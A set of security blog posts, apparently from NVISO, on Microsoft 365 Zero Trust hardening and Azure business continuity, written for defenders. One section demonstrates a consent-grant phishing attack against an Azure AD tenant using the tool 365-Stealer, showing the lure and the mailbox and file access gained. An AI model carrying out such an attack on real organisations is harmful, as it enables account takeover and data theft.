  • A team built on strong values.
  • A place that prioritizes personal growth and encourages everyone to innovate.
  • A community of experts that strives to be the best at what they do.
  • All working towards the mission of protecting European society from potentially devastating cyber attacks.

Together, we made it a reality!

This would not have been possible without the trust of our clients & partners and, most crucially, the dedication of every single NVISO bird. Thank you all!

Over the past decade, our team has made significant contributions to the field of cybersecurity through research and innovative solutions.

So, let’s take a trip down memory lane and revisit ten of the most influential articles from our blog!

  1. ApkScan
    Back in 2013, our first research project was a scanner for APKs; that Android malware analysis tool was very successful, being cited in academic papers, and helped us rapidly build knowledge and experience with what was then a relatively new challenge, mobile security. (Read more)
  2. Intercept Flutter traffic on iOS and Android
    Mobile security remains one of our big focus points, and this blogpost offers practical guidance for other testers on how to bypass SSL pinning, intercept HTTPS traffic, and use ProxyDroid during their mobile security assessments. (Read more)
  3. My journey reaching #1 on Hack The Box Belgium – 10 tips, tricks and lessons learned
    Inspiring others by sharing a personal success story – in this case, reaching the #1 spot on Hack The Box Belgium – is something we really encourage our colleagues to do. Combining hands-on tips with a few motivational memes was the recipe for this popular & often-shared blog post! (Read more)

  4. Painless Cuckoo Sandbox Installation
    Sharing hands-on practical tutorials on how to solve a problem we had to deal with ourselves has proven to be a good source of blog posts: practical tutorials where we share source code are among the most searched blog posts we publish. This particular blog post explains how to set up a Cuckoo sandbox for analyzing malware samples, which is useful for blue team members who need to analyze a suspected malware sample without submitting it to online malware analysis services that may alert adversaries. (Read more)
  5. A practical guide to RFID badge copying
    Deciding which information (not) to publish is always an important balancing act: on one hand, we want to share important information about vulnerabilities as much as possible, while also protecting potential victims without encouraging illicit use of the information. We decided to share this particular blog post to raise awareness about the potential security risks associated with RFID card reading systems, which are often the sole factor of security that prevents unauthorized access to buildings, server rooms, and offices. The post demonstrates how easy it is to clone and abuse RFID cards using specialized hardware, such as the Proxmark3, when the card reader security mechanism is insufficiently secured. (Read more)

  6. DeTT&CT: Mapping detection to MITRE ATT&CK
    A detailed, hands-on guide on mapping your detection capabilities to MITRE ATT&CK using MITRE DeTT&CT. Using it, it becomes easier to build and maintain detection rules and to spot your blind spots! (Read more)

  7. Another spin to Gamification: how we used to build a (great!) Cyber Security Game
    People are at the heart of cybersecurity. In this blog post, we outline how we crafted an – if we may say so ourselves – fun and informative game to promote cybersecurity awareness, and tell you how you can too. (Read more)

  8. PowerShell Inside a Certificate? – Part 1
    Didier Stevens outlines in this blog post how we crafted YARA detection rules that don’t just detect things we know are bad, but also check whether things actually have the format we expect them to. This way we found some PowerShell code hidden in certificate files. (Read more)

  9. Detecting DDE in MS Office documents
    Didier Stevens shares in this blog post how to detect Dynamic Data Exchange, an old technology often abused to weaponize MS Office documents. We believe sharing tips and detection rules like this one makes us all more secure in the end! (Read more)

  10. Under the hood: Hiding data in JPEG images
    In this lighthearted blog post, we dive under the hood of how you can hide your secrets inside a JPEG file. We recommend using this as a party trick or as a fun challenge, not for your TLP Red stuff! (Read more)

Enforce Zero Trust in Microsoft 365 – Part 2: Protect against external users and applications


In the first blog post of this series, we saw how strong authentication, i.e., Multi-Factor Authentication (MFA), can be enforced for users with a free Azure Active Directory subscription within the Microsoft 365 environment.

In this blog post, we will continue to harden the configuration of our Azure AD tenant to enforce Zero Trust security without any license requirement. Specifically, we will see how our organization can protect against external users and prevent malicious applications from accessing our tenant.


Settings hardening

Because some default settings in Azure Active Directory are not secure and might introduce security issues within our organization, I wanted to quickly go over them and see how they could be abused by malicious actors.

Guest users

We haven’t discussed guest users so far because access control for guest users can’t be enforced using an Azure AD free license. However, guest users might be an entry point for attackers into our Microsoft 365 environment: by compromising a user in a partner’s environment, adversaries directly gain access to our environment through the implicit trust relationship that is automatically set up when inviting guest users. We can therefore either assume that guest users are correctly protected in their home tenant (we will see in a later blog post that even if guest users have the appropriate security controls enforced in their home tenant, these controls might not be enforced in certain circumstances when accessing our tenant, i.e., the resource tenant), or restrict or disable guest user invitations. In any case, the way guest users are managed is an important consideration for our Zero Trust approach. In our case, we will not simply block guest user invites, because collaboration with external parties is important for our business and will be required. Instead, we want to take a proactive approach by setting a solid foundation before it is too late.

First, we want to ensure that no one in the organization, except authorized users, can invite guest users. Indeed, by default, all users in our organization, including guest users, can invite other guest users. This could represent a serious weakness in our Zero Trust approach. Therefore, we will only allow users assigned to specific administrator roles to invite guest users (this includes the Global Administrators, User Administrators and Guest Inviters roles).

Guest invite restrictions are configured in Azure AD. For that purpose, go to the Azure Portal > Azure Active Directory > Users > User Settings > Manage external collaboration settings under External users. Choosing the most restrictive option disables the ability to invite guest users.

Guest invite restrictions in Azure AD
Guest invite restrictions

Moreover, because our organization works with defined partners, users should only be able to collaborate with them. We can therefore further restrict invitations by specifying domains in the collaboration restrictions settings:

Collaboration restrictions
Collaboration restrictions

For these restrictions, a reliable process is required to clearly define who can manage guest users and external domains, especially if you regularly collaborate with different partners.

By default, guest users have extensive permissions. If an attacker takes over a guest account, the information the guest user has access to may be used for further attacks on our company. For this reason, we want to restrict guest users as much as possible. It might not be required for guest users to be able to enumerate resources in our Azure Active Directory tenant: this could allow adversaries that compromised a guest user to gather information on users within our tenant, such as viewing our employees for sending (consent) phishing emails to gain initial access, or viewing other partners to deceive them by impersonating our company or an employee. Therefore, we want to limit guest user permissions.

Guest user access restrictions in Azure AD
Guest user access restrictions

With these restrictions implemented for guest users, we have already decreased the potential impact that a compromised guest user could have in our environment. However, remember that with the current configuration, specific access controls, such as strong authentication for guest users, are not enforced to access our tenant. This means that a compromised guest user might still be used to access our environment.

External applications

In Azure Active Directory, applications can be integrated into the tenant to make them accessible to users. There are many types of applications that can be made accessible through Azure AD, such as cloud applications, also known as pre-integrated applications (like Office 365, the Azure Portal, Salesforce, etc.), custom applications, and on-premises applications.

Users can consent to applications to allow these applications to access organization data or a protected resource in the tenant on their behalf. Indeed, applications can request API permissions so that they can work properly. These API permissions include accessing a user’s profile, a user’s mailbox content, sending emails, etc. This can also be seen as an entry door for adversaries to gain access to information in our environment. For example, attackers could trick an employee by sending a consent link (consent phishing) to an employee for a malicious application. If the user consents, attackers would have the permissions the user has consented to. Even worse, an administrator might consent to an application for the entire organization. This means that a malicious application could potentially gain access to all directory objects.

Let’s abuse it!

If user consent is allowed in our Azure AD tenant, adversaries could send consent grant phishing to employees. Let’s see how this could be done.

First, because guest invitation restrictions were initially not configured, adversaries could access our Azure AD tenant and gather a list of our employees as well as their email addresses. They then used this list to create a phishing campaign for a Microsoft Advertising Certification study guide.

Phishing email
Phishing email

Because one employee was very eager to try out this new limited edition guide, they clicked the link and signed in with their credentials.

Application permissions request
Permission consent

Unfortunately, the employee had administrative permissions in our tenant and could therefore grant consent on behalf of the entire organization. Everyone should benefit from this free offer, right?… Not really, no. Indeed, as shown in the above screenshot, the application, which is not verified, requires extensive access, such as sending and viewing emails, read and write access to mailbox settings, and read access to notes, files, etc.

Once the user consents, adversaries can retrieve information about the user as well as about the organization. Additionally, they can access the user’s mailbox, OneDrive files and notes.

For this demonstration, I used 365-Stealer from AlteredSecurity to set up the phishing page and to access users in the directory:

Phished users in 365-Stealer

How to protect ourselves against consent grant phishing?

There is no bulletproof solution to protect users from phishing, unless you globally disable the ability for users to receive emails and messages, which is very far from ideal. Indeed, even with Office 365 threat policies, such as anti-phishing policies, and user awareness, malicious actors keep finding new ways of bypassing these policies and tricking users. However, what we can do is disable the ability for users to consent to applications in Azure AD.

To restrict user consent for applications, it is possible to disable consent entirely or to restrict the applications and permissions that users can consent to. Unless it is required, it is highly recommended to disable user consent. This is what we will do for our organization’s tenant to prevent consent grant attacks.

Consent and permissions for users
Consent and permissions for users

This setting can be configured in Azure Portal > Azure Active Directory > Users > User settings > Manage how end users launch and view their applications under Enterprise applications > Consent and permissions.

Besides blocking this functionality, it is also possible to only allow users to consent to permissions classified as low impact. Microsoft provides the ability to define our own classification model for application permissions, ranging from low to high, as shown below. In that case, administrators can select the Allow user consent for apps from verified publishers, for selected permissions (Recommended) setting in the user consent settings page:

Permission classifications for applications in Azure AD
Permission classifications for applications in Azure AD


In this blog post, we went over different settings in Azure AD that can be restricted to prevent malicious users from being added to our tenant. Moreover, we have seen how application consent settings can be abused through consent grant phishing and how we can protect against it.

I have selected these settings among others because we usually see that they are not restricted in most environments during our security assessments. However, configuring only these settings is not enough to protect your environment against malicious and unauthorized actions. If you would like to know more about how NVISO can help you secure your environment, feel free to reach out or to check our website.

In the next blog post, we will go over Azure AD Conditional Access policies, see how they can be used to further increase the security posture of our environment and implement our Zero Trust security approach.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Implementing Business Continuity on Azure

There is a general misconception among cloud consumers that the availability of their resources in the cloud is always guaranteed. This is not true, since all cloud providers, including Microsoft, offer specific SLAs for their products that almost never reach an availability target of 100%. For consumers who have deployed critical resources and applications to the cloud, reaching the company-defined targets for Business Continuity can be technically challenging and confusing. The purpose of this blog post is to provide practical guidance on how Business Continuity is expressed in the cloud, how it can be implemented for many Azure IaaS and PaaS services, and what real-world problems each solution attempts to solve.


Before we dive into the technical Azure-specific details, let’s explain what Business Continuity is and what it involves.

Business Continuity is the capability of the organization to continue the delivery of products or services at acceptable predefined levels following a disruptive incident. According to ISO 22301, business continuity is not limited only to IT and it involves many enterprise aspects.

In this blog post, we will focus on the business continuity aspects related to IT. Each of them corresponds to a specific type of SLA that you may have internally or with your customers, so there are multiple aspects of Business Continuity that may be applicable to you.

If it’s important for you to keep your services always up and running, you should focus on High Availability. This is the ability of a system to be continuously operational, or, in other words, have an uptime percentage of near 100%. It is generally achieved by implementing redundant, mirrored copies of the hardware and data, so that if one component fails, another one takes over.

If fluctuating demand and bottlenecks cause your systems to struggle, then you may need to focus on Scalability. This is the ability of a system to scale up or scale down cloud resources as needed to meet fluctuating demand. It can be considered as an aspect of Business Continuity, since peaks in demand can be the result or the cause of an incident.

Finally, to protect data that are critical to your company’s functionality and need to be always available and recoverable, you should implement Backup. This is the duplication of data to a secondary location, so that if the primary copy is harmed or becomes unavailable, data from the other location can be retrieved and the system can be rolled back to a specific point in time.

The following diagram shows an analogy between the aforementioned terms and the problems they tackle.

Business Continuity: Mapping of problems and solutions

It is important to note that the implementation of any of the controls described in this blog post should be based on a structured business continuity assessment/plan and should be selected based on the requirements of your environment or application. Careless implementation of controls could result in undue costs or in inefficient protection.

Implementing High Availability

Depending on the required uptime of your application or system and the scale of disaster you need to be able to recover from, there are many ways to implement high availability in Azure. When choosing the controls that will be implemented in your environment, you should always consider that the availability of a chain of resources is determined by the weakest link in the chain. For example, in the case of an application composed of a front-end server and a database, if the web server is spread across multiple availability zones but the database is single-instance, the whole application will become unavailable if the availability zone of the database goes down. With the above in mind, we present below the different options provided by Azure, sorted by increasing complexity and cost.

Protection against hardware failures

Small-scale technical or hardware issues may affect single-instance components. To avoid this, the component should be mirrored to a secondary hardware volume. On Azure, depending on your cloud computing state, this can be implemented as follows:


When the component is a Virtual Machine (VM), this can be achieved by using availability sets. An availability set is a logical grouping of VMs that allows Azure to understand how your application is built in order to provide redundancy and availability. While Azure guarantees a 99.9% uptime SLA for single-instance VMs, using availability sets increases the uptime SLA to 99.95%. To use availability sets on Azure VMs, you need to perform the following steps:

  1. Create an availability set;
  2. Create new VMs; in the creation wizard, under “Availability options” choose “Availability set” and then select the previously created set.

Note: It is not possible to add existing VMs to an availability set after their creation.


Azure PaaS components are protected against local hardware failures by design, guaranteeing higher uptime SLAs than IaaS. Specifically:

  • Storage Accounts: Microsoft ensures 3 instances of the service when using the default redundancy option (Locally Redundant Storage – LRS). This offers an SLA of 99.999999999% (11 nines) durability over a given year.
  • SQL Databases: By default, Microsoft ensures at least two instances of the service within the same data center, reaching 99.99% uptime.
  • Cosmos DB: By default, Microsoft provides three replicas (individual nodes) within a cluster, ensuring an SLA of 99.99% uptime.
  • App Service: Microsoft guarantees an SLA of 99.95% uptime for App Services, for tiers other than Free or Shared.

Protection against datacenter failures

To provide the option of protecting against failures that affect the whole datacenter, such as fire, power and cooling disruptions or flood, Microsoft has introduced the concept of availability zones. Availability zones are unique physical locations within an Azure region, each made up of one or more datacenters with independent power, cooling, and networking. The creation of multiple instances of services across two or more zones provides increased high availability, as it protects both against hardware and against datacenter failures.

Azure Availability Zones
Source: What are Azure regions and availability zones? | Microsoft Learn

Based on your Cloud computing model, such protection can be achieved as follows:


Virtual machines can be deployed across multiple availability zones to provide an uptime SLA of 99.99%. This can be done with the following steps:

  1. Create a VM; under “Availability options” select “Availability zone” and specify a zone. This will be the primary zone of your VM.
  2. Open the VM.
  3. Under Operations, select “Disaster recovery” and set the option “Disaster Recovery between Availability Zones?” to “Yes”. Under “Advanced settings” you will be able to see or change the secondary zone.
  4. Click on “Review and start replication”.


When it comes to PaaS services, it is generally easier to deploy them across multiple availability zones. Specifically:

  • Storage Accounts:
    • Microsoft ensures 3 instances of the service across three different availability zones (Zone Redundant Storage – ZRS). This offers an SLA of 99.9999999999% (12 nines) durability over a given year.
    • The option can be enabled during the Storage Account creation, under Basics – Redundancy.
  • SQL Databases:
    • Zone redundancy is available in the General Purpose, Hyperscale, Business Critical and Premium service tiers. The SLA depends on the tier and can reach 99.995% uptime.
    • The option can be configured during the SQL DB creation, under the Service tier selection menu, or under Settings – Compute + storage for existing databases.
  • Azure Cosmos DB Accounts:
    • Enabling zone redundancy in an Azure Cosmos DB account can increase the uptime SLA to 99.995%.
    • The option can be selected during the Cosmos DB Account creation, under Global Distribution – Availability Zones.
  • App Service:
    • Zone redundancy is only available in either Premium v2 or Premium v3 App Service Plans for Web Apps and in Elastic P2 for Function Apps. At the time of writing, Microsoft has not published specific SLAs for zone-redundant App Services, but it guarantees at least three instances of the service.
    • The option can be enabled during the creation of the Service Plan, under Zone redundancy.

Note: It is not possible to enable availability zone support after the creation of any of the above components.

Protection against regional failures

Finally, to protect against regional failures that can affect many adjacent datacenters and can be caused by large-scale natural and man-made disasters (e.g., earthquakes, tornadoes, war), Microsoft has introduced the concept of availability regions. Azure regions are physical regions all over the world, designed to offer protection against local disasters within availability zones and against regional or large-geography disasters by making use of another region and replicating the workloads to that region. The secondary region can be considered the disaster recovery site. Availability regions can be used independently of availability zones or in conjunction with them.

Azure Availability Regions
Source: What are Azure regions and availability zones? | Microsoft Learn

Based on the Cloud computing model of the application components that you want to protect, you have the following options:


Virtual machines can be deployed across multiple availability regions to provide an uptime SLA of 99.99%. This capability is offered by the Azure Site Recovery service, which orchestrates the replication, failover, and recovery of the VMs. Site Recovery can be implemented with the following steps:

  1. Open the VM for which you want to configure regional redundancy.
  2. Under Operations, select “Disaster recovery”, set the option “Disaster Recovery between Availability Zones?” to “No” and select a target region.
  3. Click on “Review and start replication”.


PaaS services can be protected from regional disasters as follows:

  • Storage Accounts:
    • With the Geo Redundant Storage option (GRS), Microsoft ensures that there are 3 instances of the Storage Account in the primary region and another 3 instances in the secondary region. This offers an SLA of 99.99999999999999% (16 nines) durability over a given year. There is also the option of Geo-Zone-Redundant Storage (GZRS), which spreads the instances of the primary region across 3 different availability zones, to enable faster recovery in case of a datacenter failure.
    • The option can be enabled under Data Management – Redundancy for an existing Storage Account.
  • SQL Databases:
    • An additional replica for read operations can be created in a secondary region and used as a disaster recovery site. The SLAs for the geo-redundant setup vary depending on the selected service tier.
    • The option can be configured for a given SQL DB, under the Service tier selection menu.
  • Azure Cosmos DB Accounts:
    • Enabling geo redundancy in an Azure Cosmos DB account can increase the SLA for read operations to 99.999%.
    • The option can be selected during the Cosmos DB Account creation, under Global Distribution – Geo-Redundancy, or for an existing Cosmos DB account under Settings – Replicate data globally.
  • App Service:
    • As of the time of writing, there is no geo-redundancy support for Azure App Service.

Before closing with High Availability, remember that a highly available system is a system that your customers and employees can rely on. It increases the credibility of your company, improves its reputation and offers peace of mind to your valuable users. Although costs may go up, depending on your implementation choices, it will help you establish yourself as a trustworthy partner.

Implementing scalability

For systems whose load can abruptly increase or decrease, a problem arises: How can you guarantee the available level of resources during high periods, while at the same time keeping your costs to the minimum during the low periods? This is the essence of scaling, and in the cloud, achieving this balance is much easier than in traditional, on-premises infrastructures. There are two main ways that an application can scale: vertical scaling and horizontal scaling. Vertical scaling (scaling up) increases the capacity of a resource, for example, by increasing the VM size, CPU, memory, etc. Horizontal scaling (scaling out) adds new instances of a resource, such as VMs or database replicas.

Vertical vs horizontal scaling

While vertical scaling can be achieved more easily, and without making any changes to the application, at some point it hits a limit beyond which the system cannot be scaled any further. Horizontal scaling, on the other hand, is more flexible, cheaper, and well suited to large, distributed workloads. It also enables autoscaling, the process of dynamically allocating resources to maintain performance. That is why, especially in the cloud, horizontal scaling is the recommended option.
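As a back-of-the-envelope illustration of the scale-out logic an autoscaler applies, the sizing decision boils down to the sketch below. The function name, capacities, and bounds are invented for the example; real Azure autoscale rules are configured per metric on the resource itself.

```python
import math

def desired_instances(current_load, capacity_per_instance,
                      min_instances=2, max_instances=10):
    """Horizontal (scale-out) sizing: add enough instances to absorb
    the current load, clamped to a configured min/max range."""
    needed = math.ceil(current_load / capacity_per_instance)
    return max(min_instances, min(needed, max_instances))

# Quiet period: the load fits within the minimum instance count.
print(desired_instances(current_load=120, capacity_per_instance=100))   # 2
# Peak period: scale out, but never beyond the configured maximum.
print(desired_instances(current_load=1500, capacity_per_instance=100))  # 10
```

The clamping is what keeps costs bounded during spikes and guarantees a floor of capacity during quiet periods.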

The options Azure provides you with are as follows:


Scalability of Virtual Machines in Azure can be achieved through Virtual Machine Scale Sets (VMSS). These represent groups of load-balanced VMs that provide scalability to applications by automatically increasing or decreasing the number of VM instances in response to demand or a defined schedule. VMSS can be deployed into one Availability Zone, multiple Availability Zones or even regionally.

During the creation of a VMSS resource, the cloud consumer can specify the scalability options and minimum instance number, the Load Balancer (or Application Gateway, in case of HTTPS traffic) that will be used, and other networking and orchestration options.


In most cases, managed PaaS services have horizontal scaling and autoscaling built in. The ease of scaling these services is a major advantage of using Azure PaaS services.

Specifically for App Service, we should point out that the scaling options depend on the App Service plan (tier) and can reach a maximum of 100 instances when using the Isolated tier.

Implementing backups

Although HA solves the problem of small or extended failures, what happens if the unavailability of data originates from a malicious threat, such as a ransomware attack? In this case, a highly available infrastructure will simply replicate the encrypted or corrupted files everywhere almost immediately, leaving no recovery options. This is where remote data copies, unaffected by real-time modifications, show their value. With Azure Backup, regular backups and snapshots of workloads are taken, so that in case of unauthorized modification or deletion, the service can be restored to a specific point in time.

Backups in Azure can be implemented both for IaaS and for PaaS services, and the options are presented below.


VM backups can be either locally redundant or zone redundant. Recovery from backups can be implemented in two ways: the standard option generates backups once a day and maintains instant restore snapshots for 2 days, while the enhanced option generates multiple backups per day, maintains instant restore snapshots for 7 days, and spreads snapshots across zones for increased resiliency. The enhanced option is intended for VMs of high criticality.

In an existing Azure VM, Backups can be configured under Operations – Backup.


Multiple backup options also exist for different PaaS services:

  • Storage Accounts:
    • Azure provides the option to configure operational backups of the blobs of a Storage Account.  This is a local backup solution that maintains data for a specified duration in the source storage account itself. Although a Backup Vault is required to manage the backup, there is no copy of the data stored in the Vault. The backup is continuous and allows the reversion to a specific point in time in case of data corruption.
    • The option can be configured under Data management – Data protection for existing Storage Accounts, by selecting the checkbox “Enable operational backup with Azure Backup” and following the necessary steps presented in the portal.
  • SQL Databases:
    • Azure gives the option of locally redundant, zone-redundant or geo-redundant backups.
    • Configuration can be performed with the option “Backup storage redundancy” under Settings – Compute + storage for existing databases, or under Basics – “Backup storage redundancy” during the database creation.
  • Azure Cosmos DB Accounts:
    • Two options are offered for backup functionality: periodic (LRS, ZRS, or GRS) or continuous backup. When using the periodic backup mode, the default for all accounts, backups are taken at periodic intervals and the data can only be restored by creating a request with Microsoft’s support team. In contrast, continuous backup facilitates restoration to any point in time within either 7 or 30 days (depending on the tier) through the portal.
    • The option can be configured under “Backup Policy” during creation, or under the “Backup & Restore” pane for existing accounts.
  • App Service:
    • Azure provides the possibility to back up an App’s content, configuration, and database by enabling and scheduling periodic backups, which are stored in a Storage Account.
    • Backup and restoration options can be configured under Settings – Backups for existing App Services.

Overall, it is important to strike a balance between the frequency of backups and the number of retained snapshots, so that you lose as little data as possible in case of an incident, can revert to a healthy past state, and at the same time keep costs at a level acceptable to your company.
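This trade-off can be made tangible with a small calculation. The helper and the per-snapshot cost figure below are purely illustrative assumptions, not Azure pricing: more frequent backups shrink the worst-case data loss, but retaining more snapshots costs more.

```python
def backup_tradeoff(backups_per_day, retention_days, cost_per_snapshot):
    """Illustrative trade-off between worst-case data loss and cost.

    Returns (worst-case hours of lost data, retained snapshot count,
    monthly retention cost) for a given backup policy.
    """
    worst_case_data_loss_hours = 24 / backups_per_day
    retained_snapshots = backups_per_day * retention_days
    monthly_cost = retained_snapshots * cost_per_snapshot
    return worst_case_data_loss_hours, retained_snapshots, monthly_cost

# Daily backups kept for 30 days vs. hourly backups kept for 7 days
print(backup_tradeoff(1, 30, 0.5))   # (24.0, 30, 15.0)
print(backup_tradeoff(24, 7, 0.5))   # (1.0, 168, 84.0)
```

In this toy model, hourly backups cut the worst-case data loss from a day to an hour, at roughly five times the retention cost.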


To conclude, it all comes down to one question: can you survive? Can you recover from disasters as small as power interruptions and as big as pandemics and earthquakes? Business Continuity is the key to the answer. And in the modern, distributed cloud world, all the capabilities are there – it’s just up to you, and your dedication and commitment, to implement the ones that are essential to your business.

Elpida Rouka

Elpida is an Information Security Consultant, with expertise in Azure/O365 Security, SIEM, Identity & Access management, Risk management, Information Security Management Systems (ISMS) and Business Continuity planning (ISO22301). She is always eager to create innovative high-quality solutions that precisely meet business needs.

Stijn Wellens

Stijn is a manager with experience in cloud and network security. He is Solution Lead for Cloud Security Assessments and Microsoft Cloud Security Engineering at NVISO. Besides the technical challenges during Azure and Microsoft 365 security roadmap implementations, Stijn enjoys coaching the teams by sharing his knowledge and experience.

Enforce Zero Trust in Microsoft 365 – Part 1: Setting the basics

This first blog post is part of a series of blog posts related to the implementation of a Zero Trust approach in Microsoft 365. This series will first cover the basics and then deep dive into the different features, such as Azure Active Directory (Azure AD) Conditional Access policies, Microsoft Defender for Cloud Apps policies, Information Protection, and Microsoft Endpoint Manager, to name only a few.

In this first part, we will go over the basics that can be implemented in a Microsoft 365 environment to get started with Zero Trust. For the purpose of this blog post, we will assume that our organization has decided to migrate to the cloud. We have just started investigating which quick wins can be easily implemented, which features will need to be configured to ensure the security of identities and data, and which more advanced features could be used to meet specific use cases.

Of course, the journey to implement Zero Trust is not an easy one. Some important decisions will need to be made to ensure the relevant features are used and correctly configured according to your business, compliance, and governance requirements without impacting user productivity. Therefore, the goal of this series of blog posts is to introduce you to possible approaches to Zero Trust security in Microsoft 365.


However, before starting we need to set the scene by quickly going over some principles.

First, what is a Zero Trust security approach? Well, this security model says that you should never trust anyone and that each request should be verified regardless of where the request originates or what the accessed resource is. In other words, this model will assume that each request comes from an uncontrolled or compromised network. Microsoft provides this nice illustration to represent the primary elements that contribute to Zero Trust in a Microsoft 365 environment:

Zero Trust approach in Microsoft 365
Zero Trust approach in Microsoft 365

We will go over these components as part of this blog post series.
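To make "never trust, always verify" concrete, here is a deliberately simplified sketch of per-request policy evaluation. The attributes and rules are invented for illustration; in practice this evaluation is performed by Azure AD, notably through Conditional Access.

```python
from dataclasses import dataclass

@dataclass
class AccessRequest:
    """A toy model of the signals inspected for every single request."""
    user_mfa_done: bool
    device_compliant: bool
    location_trusted: bool

def evaluate(request: AccessRequest) -> str:
    """Verify every request explicitly; nothing is trusted just
    because it originates from a 'corporate' network."""
    if not request.user_mfa_done:
        return "challenge-mfa"
    if not request.device_compliant:
        return "deny"
    # Even from a trusted location, the checks above still ran.
    return "allow"

print(evaluate(AccessRequest(True, True, True)))    # allow
print(evaluate(AccessRequest(False, True, True)))   # challenge-mfa
print(evaluate(AccessRequest(True, False, False)))  # deny
```

The point of the sketch is the ordering: verification happens on every request, and the network location alone never short-circuits the checks.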

You may wonder why I have decided to discuss Zero Trust in Microsoft 365: because I think it is one of the most, if not the most, important aspects of a cloud environment. Indeed, with cloud environments, identities are considered the new perimeter, as they can be used to access Internet-facing administrative portals and applications from any Internet-connected device.

Furthermore, even when security controls are enforced, it does not mean that the environment is secure. Many attacks in recent years have allowed attackers to bypass security controls, through social engineering and phishing, for example. Therefore, the goal is more to reduce the potential impact of a security breach on the environment than to prevent attacks from succeeding.

Finally, let’s go over some Microsoft 365 principles. When an organization signs up for a Microsoft 365 subscription, an Azure AD tenant is created as part of the underlying services. For data residency requirements, Microsoft lets you choose the logical region where you want to deploy your instance of Azure AD. This region determines the location of the data centers where your data will be stored. Moreover, Microsoft 365 uses Azure AD to manage user identities. Azure AD offers the possibility to integrate with an on-premises Active Directory Domain Services (AD DS) deployment, as well as to manage integrated applications. It is therefore important to understand that most of the work to set up a Zero Trust approach will be done in Azure AD.

Let’s get started!

Our organization has just bought a paid Microsoft 365 subscription, which comes with a free subscription to Azure AD. The free Azure AD tier includes some basic features that will allow us to get started on our journey. Let’s go over them!

Security Defaults

The first capability is the Azure AD Security Defaults. The Security Defaults are a great first step to improve the security posture by enforcing specific access controls:

  • Unified Multi-Factor Authentication (MFA) registration: All users in the tenant must register for MFA. With Security Defaults, users can only register for Azure AD Multi-Factor Authentication by using the Microsoft Authenticator app with push notifications. Note that once registered, users will also have the possibility to use a verification code (Global Administrators will additionally be able to register for phone call or SMS as a second factor). Another important note is that disabling MFA methods may lead to locking users out of the tenant, including the administrator that configured the setting, if Security Defaults are being used;
  • Protection of administrators: Because privileged users have elevated access to an environment, users assigned to specific administrator roles are required to perform MFA each time they sign in;
  • Protection of users: All users in the tenant are required to perform MFA whenever necessary. This is decided by Azure AD based on different factors such as location, device, and role. Note that this does not apply to the Azure AD Connect synchronization account in case of a hybrid deployment;
  • Block the use of legacy authentication protocols: Legacy authentication protocols are protocols that do not support Multi-Factor Authentication. Even if a policy is configured to require MFA, users would be allowed to bypass it if such protocols were used. In Microsoft 365, legacy authentication comes from clients that don’t use modern authentication, such as Office versions prior to Office 2013, and from mail protocols such as IMAP, SMTP, or POP3;
  • Protection of privileged actions: Users that access the Azure Portal, Azure PowerShell or Azure CLI must complete MFA.
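If you later want to verify the state of Security Defaults programmatically, the policy is exposed through Microsoft Graph. The sketch below only builds the request; the helper name and the placeholder token are ours, and actually sending it requires a valid access token with the appropriate policy-read permission (typically `Policy.Read.All`).

```python
import urllib.request

GRAPH_SECURITY_DEFAULTS = (
    "https://graph.microsoft.com/v1.0/"
    "policies/identitySecurityDefaultsEnforcementPolicy"
)

def security_defaults_request(access_token: str) -> urllib.request.Request:
    """Build (but do not send) the Graph call whose response reports
    whether Security Defaults are enabled ('isEnabled' property)."""
    return urllib.request.Request(
        GRAPH_SECURITY_DEFAULTS,
        headers={"Authorization": f"Bearer {access_token}"},
    )

req = security_defaults_request("<token>")
print(req.full_url)
```

Checking this over all tenants you manage is an easy way to catch environments where the baseline was never enabled.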

These features already help increase the security posture by enforcing strong authentication. Therefore, they can be considered a first step for our organization, which has just started to use Microsoft 365 and is still evaluating the different possibilities.

If we want to enable Security Defaults, we go to the Azure Portal > Azure Active Directory > Properties > Manage Security Defaults:

Enable Security Defaults in Azure AD
Enabling Security Defaults

However, there are important deployment considerations to be respected before enabling Security Defaults. Indeed, it is a best practice to have emergency accounts. These accounts are usually assigned the Global Administrator role, the most privileged role in Azure AD/Microsoft 365 and are created to enable access to the environment when normal administrator accounts can’t be used. This could be the case if Azure AD MFA experiences outages. Because of the purpose of such accounts, these users should either be protected with a very strong first authentication method (e.g., strong password stored in secure location such as a physical vault that can only be accessed by a limited set of people under specific circumstances) or use a different second authentication factor than other administrators (e.g., if Azure AD MFA is used for administrator accounts used regularly, a third party MFA provider, such as hardware tokens, can be used). But here is the problem: this is not possible when using Security Defaults.

Per-user MFA settings

Note that the per-user MFA settings, also known as legacy multifactor authentication, will be deprecated on September 30th, 2024.

The second capability with an Azure AD free license is the per-user MFA settings. These settings can be used to require Multi-Factor Authentication for specific users each time they sign in. However, some exceptions are possible by turning on the ‘Remember MFA on trusted devices’ setting. Note that, when enabled, this setting allows users to mark their own personal or shared devices as trusted; this is possible because the setting does not rely on any device management solution. Users who select this option will only be asked to reauthenticate every few days or weeks, with the interval depending on the configuration.

We usually do not recommend using the ‘Remember MFA on trusted devices’ setting unless you do not want to use Security Defaults and do not have Azure AD Premium licenses. Indeed, this setting allows any user to trust any device, including shared and personal devices, for the specified number of days (between one and 365). These settings can be configured in the portal as follows.

In the user settings, MFA can be enabled for each individual user.

Per-user MFA settings in Azure AD
Per-user MFA users settings

Then, in the service settings, we can allow users to create app passwords for legacy applications that do not support MFA, select authentication methods that are available for all users, and allow or not users to remember Multi-Factor Authentication on trusted devices for a given period of time. Note that the trusted IP addresses feature requires an additional license (Azure AD Premium P1) that we do not have for the moment.

Legacy MFA settings in Azure AD
Per-user MFA service settings


These two features are quite different but allow us to achieve the same goal: enforcing strong authentication, i.e., MFA, for all or some users.

For our organization we will choose the Security Defaults for multiple reasons:

  • The per-user MFA settings can quickly become unmanageable. This is especially true for a growing organization. With more people and a complex environment, exceptions will be required, and it will become difficult to keep track of the configuration and maintain a good baseline. Security Defaults, on the other hand, allow you to enforce a standard baseline for all users;
  • With per-user MFA, users will be prompted for MFA every time they sign in. This degrades the user experience, and productivity might be impacted;
  • Security Defaults block legacy authentication protocols that might be used to bypass MFA in some cases. This protects identities, including administrators, from brute-force or password-spraying attacks and helps mitigate the risk of successful phishing attacks to a certain extent;
  • Multi-Factor Authentication registration is enforced with Security Defaults for all users, meaning that all users will be able to perform MFA when required.

